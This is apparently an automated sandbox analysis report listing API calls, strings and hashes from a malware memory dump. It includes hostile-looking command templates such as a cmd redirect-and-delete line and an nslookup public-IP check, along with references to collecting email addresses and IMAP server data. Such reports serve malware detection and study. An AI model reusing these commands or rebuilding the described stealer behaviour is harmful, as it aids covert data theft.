                                                                                                                                          • Part of subcall function 0045E99C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045EA25
                                                                                                                                          • Part of subcall function 0045E99C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,*<F), ref: 0045EA51
                                                                                                                                          • Part of subcall function 0045E99C: TerminateProcess.KERNEL32(?,000003E5), ref: 0045EA67
                                                                                                                                          • Part of subcall function 0045E99C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 0045EA7B
                                                                                                                                          • Part of subcall function 0045E99C: CloseHandle.KERNEL32(?), ref: 0045EAAE
                                                                                                                                          • Part of subcall function 0045E99C: CloseHandle.KERNEL32(?), ref: 0045EAB3
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 004621EE
                                                                                                                                        Strings
                                                                                                                                        • cmd /U /C "type %s1 > %s & del %s1", xrefs: 004621CC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                                                                                                                        • String ID: cmd /U /C "type %s1 > %s & del %s1"
                                                                                                                                        • API String ID: 1624158581-4158521270
                                                                                                                                        • Opcode ID: 25fd3b7efc183272f3605a2122a27218f6e606fcf0c986446b2b17d43b92fc22
                                                                                                                                        • Instruction ID: 03a0845c153fb52b790f4360f384b879f83d4191b4ddf336620eab02796bfa14
                                                                                                                                        • Opcode Fuzzy Hash: 25fd3b7efc183272f3605a2122a27218f6e606fcf0c986446b2b17d43b92fc22
                                                                                                                                        • Instruction Fuzzy Hash: FBF0A731A4455177D121272ABC0DF5B7F6CEBC2B61F150236F915E12E1FEA48C0A85AF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00463537, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 00463540
                                                                                                                                        • Sleep.KERNEL32(0000000A,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0046354A
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 00463578
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0046358D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                        • String ID: 0123456789ABCDEF
                                                                                                                                        • API String ID: 58946197-2554083253
                                                                                                                                        • Opcode ID: 60895cc953b16be230fa779e24dda39c6e895ef34470fcc5311a618c47e99df3
                                                                                                                                        • Instruction ID: d4ac8c6bbaedc90b80be7e53d29fd7bad5610c426e712be0a823b8335f4ba292
                                                                                                                                        • Opcode Fuzzy Hash: 60895cc953b16be230fa779e24dda39c6e895ef34470fcc5311a618c47e99df3
                                                                                                                                        • Instruction Fuzzy Hash: 25F0FE78200241EFE7088F15DD49B9637A4AB15701B05452AF907D7360FBB4EE41DA1F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00448776, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 126COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,00000008), ref: 004488B6
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 00465284: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,004658DA,00000000), ref: 00465295
                                                                                                                                          • Part of subcall function 00465284: lstrlenW.KERNEL32(0046A4C8,00000000,?,00000000,004658DA,00000000), ref: 004652AC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$AllocateErrorHeapLast
                                                                                                                                        • String ID: 1.0$A8000A$EmailAddressCollection/EmailAddress[%u]/Address$_iF
                                                                                                                                        • API String ID: 3415590935-3983310155
                                                                                                                                        • Opcode ID: 59343cc6d1cb7d9a8f267060fd18ad864a2a6d6c7ab643072ec9bb518e11efa7
                                                                                                                                        • Instruction ID: 8788be38bfb4d6c89e01186bd36794b6267f1507db268700e46704fa62c9af70
                                                                                                                                        • Opcode Fuzzy Hash: 59343cc6d1cb7d9a8f267060fd18ad864a2a6d6c7ab643072ec9bb518e11efa7
                                                                                                                                        • Instruction Fuzzy Hash: E9411D74A00205AFDB10EFA5C888EAEB7B8EF84705B244459F905EB351DB79EE01CB64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004630DD, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044AD37: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 0044AD43
                                                                                                                                          • Part of subcall function 0044AD37: SetLastError.KERNEL32(000000B7,?,004630F1,?,?,00000000,?,?,?), ref: 0044AD54
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 00463111
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 004631E9
                                                                                                                                          • Part of subcall function 0044AA04: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0044AA1E
                                                                                                                                          • Part of subcall function 0044AA04: CreateWaitableTimerA.KERNEL32(0046E0F8,?,?), ref: 0044AA3B
                                                                                                                                          • Part of subcall function 0044AA04: GetLastError.KERNEL32(?,?), ref: 0044AA4C
                                                                                                                                          • Part of subcall function 0044AA04: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 0044AA8C
                                                                                                                                          • Part of subcall function 0044AA04: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 0044AAAB
                                                                                                                                          • Part of subcall function 0044AA04: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 0044AAC1
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?), ref: 004631D2
                                                                                                                                        • ReleaseMutex.KERNEL32(00000000,?,00000000,?,?,?), ref: 004631DB
                                                                                                                                          • Part of subcall function 0044AD37: CreateMutexA.KERNEL32(0046E0F8,00000000,?,?,004630F1,?,?,00000000,?,?,?), ref: 0044AD67
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 004631F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1700416623-0
                                                                                                                                        • Opcode ID: 4c1352b90ea944946278ab71e5ef7dc79cfc17efa38ac15c943838d8eb2c880a
                                                                                                                                        • Instruction ID: 438e2386f9eeb5ff5e65d4021dc7aa890b5ca28d8d75fd553950e54ea912ee88
                                                                                                                                        • Opcode Fuzzy Hash: 4c1352b90ea944946278ab71e5ef7dc79cfc17efa38ac15c943838d8eb2c880a
                                                                                                                                        • Instruction Fuzzy Hash: EB3190B5F002449FCB109F65DC448AA7BBAFB8A305710443BE812D7361FAB89D11CB2A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00461AE6, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 00461AFF
                                                                                                                                          • Part of subcall function 004649E9: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0044EDBE), ref: 00464A0F
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,00000000,004561AA,00000000), ref: 00461B41
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 00461B93
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,004561AA,00000000), ref: 00461BAC
                                                                                                                                          • Part of subcall function 00442DED: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00442E0E
                                                                                                                                          • Part of subcall function 00442DED: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 00442E51
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,004561AA,00000000), ref: 00461BE4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1921436656-0
                                                                                                                                        • Opcode ID: 043a61e4c3d103128f4c9679beec697009e55ad19a772b8e820b246b40d00d45
                                                                                                                                        • Instruction ID: d84bf5bbbeb65a40574a0c0945bb5132370900706ecb774db8ce5770b7dda8a2
                                                                                                                                        • Opcode Fuzzy Hash: 043a61e4c3d103128f4c9679beec697009e55ad19a772b8e820b246b40d00d45
                                                                                                                                        • Instruction Fuzzy Hash: 75316071A00204AFDF11DFA5CD80AAE7BB4EF04B50F14406AE905EB261F774AE41CB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00442FFD, Relevance: 7.6, APIs: 5, Instructions: 99memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045374D: lstrlen.KERNEL32(00000000,?,00000F00), ref: 00453771
                                                                                                                                          • Part of subcall function 0045374D: StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 004537FD
                                                                                                                                          • Part of subcall function 0045374D: HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 0045381A
                                                                                                                                          • Part of subcall function 0045374D: DeleteFileA.KERNEL32(00000000,00000000,?,?,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00453822
                                                                                                                                          • Part of subcall function 0045374D: HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00453831
                                                                                                                                        • StrChrA.SHLWAPI(?,0000003A,00000000,00000000), ref: 004430B3
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 004430C7
                                                                                                                                        • StrTrimA.SHLWAPI(?,0A0D0920,?,?,00000000), ref: 004430FB
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00443104
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0044311E
                                                                                                                                          • Part of subcall function 00447C1B: memset.NTDLL ref: 00447C4A
                                                                                                                                          • Part of subcall function 00447C1B: lstrlen.KERNEL32(?), ref: 00447C5A
                                                                                                                                          • Part of subcall function 00447C1B: strcpy.NTDLL ref: 00447C71
                                                                                                                                          • Part of subcall function 00447C1B: StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 00447C7B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap$lstrlen$Trim$DeleteFilememsetstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1047761332-0
                                                                                                                                        • Opcode ID: 40875e4ec61c9f8168524d6df98cef7cd71d028207211de181f18a86a24b0240
                                                                                                                                        • Instruction ID: f3facb250764925212248d98bc4db58c1bf7df28d6dfbcb260db7aae1cbd85c5
                                                                                                                                        • Opcode Fuzzy Hash: 40875e4ec61c9f8168524d6df98cef7cd71d028207211de181f18a86a24b0240
                                                                                                                                        • Instruction Fuzzy Hash: F431B771A00005ABEF349FD4DC849BEB7A5DF00B46F2401BBE101E26A5DB7C4F889A5B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00454999, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,74B05520,?,?,00458DD3,00000000,?,?), ref: 004549B7
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70), ref: 004549C7
                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA), ref: 004549F3
                                                                                                                                        • GetLastError.KERNEL32(?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00454A18
                                                                                                                                        • CloseHandle.KERNEL32(000000FF,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70,?), ref: 00454A29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastReadSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577853679-0
                                                                                                                                        • Opcode ID: f2514433567aac5191ab1838728be766165d05f443725af42785416e664d9056
                                                                                                                                        • Instruction ID: 160078190dce67aec855d61db9cf0d9b2d826e17651fbf9e0e548767a7c8b14b
                                                                                                                                        • Opcode Fuzzy Hash: f2514433567aac5191ab1838728be766165d05f443725af42785416e664d9056
                                                                                                                                        • Instruction Fuzzy Hash: 78118C72140204FFCB205F64DC84EAF7B5CEB8035AF01462BFD05AB241D6749C8887AD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00453633, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrChrA.SHLWAPI(?,0000002C), ref: 00453644
                                                                                                                                        • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 0045365D
                                                                                                                                        • StrTrimA.SHLWAPI(?,20000920), ref: 00453685
                                                                                                                                        • StrTrimA.SHLWAPI(00000000,20000920), ref: 00453694
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 004536CB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Trim$FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2132463267-0
                                                                                                                                        • Opcode ID: fa3d78fc6f7e706fb167c788d572697ea1c903ad77becbaa4cde6bfbafa6de07
                                                                                                                                        • Instruction ID: ebcb93cb85af361b935b27c40ffc763ccbcf04aa56219d729ab1ff9056c8a9ec
                                                                                                                                        • Opcode Fuzzy Hash: fa3d78fc6f7e706fb167c788d572697ea1c903ad77becbaa4cde6bfbafa6de07
                                                                                                                                        • Instruction Fuzzy Hash: 04118476600209BBD7219B59DC85F977BACDB44792F100026FD098B351EBF4ED48C759
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00448F8D, Relevance: 7.6, APIs: 5, Instructions: 68memoryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                        • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 00448FB9
                                                                                                                                        • StrTrimA.SHLWAPI(?,20000920), ref: 00448FD6
                                                                                                                                        • DeleteFileA.KERNEL32(00000000,00003219), ref: 00449013
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00449022
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00003219), ref: 00449034
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileTemp$FreeHeapPathTime$CurrentDeleteNameSystemThreadTrimlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2468597211-0
                                                                                                                                        • Opcode ID: 610b9d91030d51b553c50982c2a826e6c33e1acd67306c1d52668fff1086a606
                                                                                                                                        • Instruction ID: f57a519fae2f6e31110d8132d428c981b9f62d8208c9ed9878f8d8b54773bbe8
                                                                                                                                        • Opcode Fuzzy Hash: 610b9d91030d51b553c50982c2a826e6c33e1acd67306c1d52668fff1086a606
                                                                                                                                        • Instruction Fuzzy Hash: 6E1101317042096BF3226B699C45F5B7B9CAF55705F01043AFA05962A2EAE95C48932E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045E76A, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 0045E798
                                                                                                                                        • GetLastError.KERNEL32 ref: 0045E7BB
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045E7CE
                                                                                                                                        • GetLastError.KERNEL32 ref: 0045E7D9
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0045E821
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1671499436-0
                                                                                                                                        • Opcode ID: f39004b02af6cc1ed85a9a304b71f1f8520bf04ff1afdc4df7ae25daedac1998
                                                                                                                                        • Instruction ID: 44ee8b708b9a41becdb8973e1f84a4649e493e7ae6c4ed88edb7c909f6dbd415
                                                                                                                                        • Opcode Fuzzy Hash: f39004b02af6cc1ed85a9a304b71f1f8520bf04ff1afdc4df7ae25daedac1998
                                                                                                                                        • Instruction Fuzzy Hash: 3221F970500240EBE7289F52DD8CB5F7BB8FB00316F600569F502921E1D7B99E89DB1A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045602F, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00457D8C,?,?,?,?,00000008,00457D8C,00000000,?), ref: 0045604C
                                                                                                                                        • memcpy.NTDLL(00457D8C,?,00000009,?,?,?,?,00000008,00457D8C,00000000,?), ref: 0045606E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00456086
                                                                                                                                        • lstrlenW.KERNEL32(00000000,00000001,00457D8C,?,?,?,?,?,?,?,00000008,00457D8C,00000000,?), ref: 004560A6
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00457D8C,00000000,?), ref: 004560CB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3065863707-0
                                                                                                                                        • Opcode ID: 5b45895b010c633fe104ebf4434ddd15f2049dc9ba75a24d1b2c9e4e16472800
                                                                                                                                        • Instruction ID: 715580f35bd3d713d4ed4994b34d0d92856462aa3e06987c39046d4be122f0e9
                                                                                                                                        • Opcode Fuzzy Hash: 5b45895b010c633fe104ebf4434ddd15f2049dc9ba75a24d1b2c9e4e16472800
                                                                                                                                        • Instruction Fuzzy Hash: E311D675E00208BBCB109BA5DC49F8E7BB8DB08711F018065FA09D7291EA74D64CCB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00459212, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 00459232
                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 00459240
                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?), ref: 0045924D
                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 00459264
                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 00459270
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1178273743-0
                                                                                                                                        • Opcode ID: 26146c1b5706b87129acd81b08b13dfeaecd649d29bba15c487d7f3c1caba723
                                                                                                                                        • Instruction ID: 42428828ea58b5993506035ce0ee4f20f786feea5bcdbf3478d982088431737d
                                                                                                                                        • Opcode Fuzzy Hash: 26146c1b5706b87129acd81b08b13dfeaecd649d29bba15c487d7f3c1caba723
                                                                                                                                        • Instruction Fuzzy Hash: EC018F31B00206AB9F015F7ADC409567BA9FF14361704443BFD14C2222EBB29C158B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045B198, Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,00459582), ref: 0045B19E
                                                                                                                                        • StrTrimA.SHLWAPI(00000001,0A0D0920,?,00459582), ref: 0045B1C1
                                                                                                                                        • StrTrimA.SHLWAPI(00000000,0A0D0920,?,00459582), ref: 0045B1D0
                                                                                                                                        • _strupr.NTDLL ref: 0045B1D3
                                                                                                                                        • lstrlen.KERNEL32(00000000,00459582), ref: 0045B1DB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Trim$_struprlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2280331511-0
                                                                                                                                        • Opcode ID: 607093f98b83392360747fcb77d0af7a820fbd5e9c5f091244ac180580ff8892
                                                                                                                                        • Instruction ID: f78441c85a4e027f7d02fb7bda06c5cedf3316addf6ec617248cdb9fa6a745c1
                                                                                                                                        • Opcode Fuzzy Hash: 607093f98b83392360747fcb77d0af7a820fbd5e9c5f091244ac180580ff8892
                                                                                                                                        • Instruction Fuzzy Hash: 8CF0AF71602111AFE3159B26AC89F3B37A8EB49A51B000069F405C7291EBE49C06876A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00453B3F, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00453B4A
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00453B5B
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,00462EBB,?,?,0046E268,00444657,00000003), ref: 00453B72
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,00462EBB,?,?,0046E268,00444657,00000003), ref: 00453B8C
                                                                                                                                        • GetLastError.KERNEL32(?,?,00462EBB,?,?,0046E268,00444657,00000003), ref: 00453B99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 653387826-0
                                                                                                                                        • Opcode ID: abf2dda702b40c12007d8551ae89760e7c17a2f11a3cbdc27c1957744e056873
                                                                                                                                        • Instruction ID: cd7befb2dd7c8e505927f2f7f253d3f2289e1730bfa5ea94dad79a0c279113ea
                                                                                                                                        • Opcode Fuzzy Hash: abf2dda702b40c12007d8551ae89760e7c17a2f11a3cbdc27c1957744e056873
                                                                                                                                        • Instruction Fuzzy Hash: C7017CB5200704AFD7209F25CC04E6AB7B9EB85321B114929EA4293261EB70F9068B29
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045B7A8, Relevance: 7.5, APIs: 5, Instructions: 39synchronizationthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00442D6E: InterlockedExchange.KERNEL32(?,000000FF), ref: 00442D75
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0045B7C0
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0045B7D0
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0045B7D9
                                                                                                                                        • VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,000000FF,000000FF,00447909), ref: 0045B7F7
                                                                                                                                        • VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,000000FF,000000FF,00447909), ref: 0045B804
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual$CloseCurrentExchangeHandleInterlockedObjectSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2588964033-0
                                                                                                                                        • Opcode ID: a74f184bf60ae9b7740ff8851edf607e4a366baf4f8723a8004af1c29b5e272b
                                                                                                                                        • Instruction ID: 38a97eecc1bbbfe738124a9586ba77984732b027f28fd35aec40d8cee5661244
                                                                                                                                        • Opcode Fuzzy Hash: a74f184bf60ae9b7740ff8851edf607e4a366baf4f8723a8004af1c29b5e272b
                                                                                                                                        • Instruction Fuzzy Hash: E7F03171500704ABD630AF76DC88F5B73ACFF44351F100A2AF581925A1EB78E848CA69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00450E49, Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 37stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000000,IMAP,?,00000057,?,004654AE,?,IMAP,Server,00000000,00000000,00000000,?,?,0044B7EA,?), ref: 00450E5A
                                                                                                                                        • lstrlen.KERNEL32(?,?,004654AE,?,IMAP,Server,00000000,00000000,00000000,?,?,0044B7EA,?,00000001,?), ref: 00450E61
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
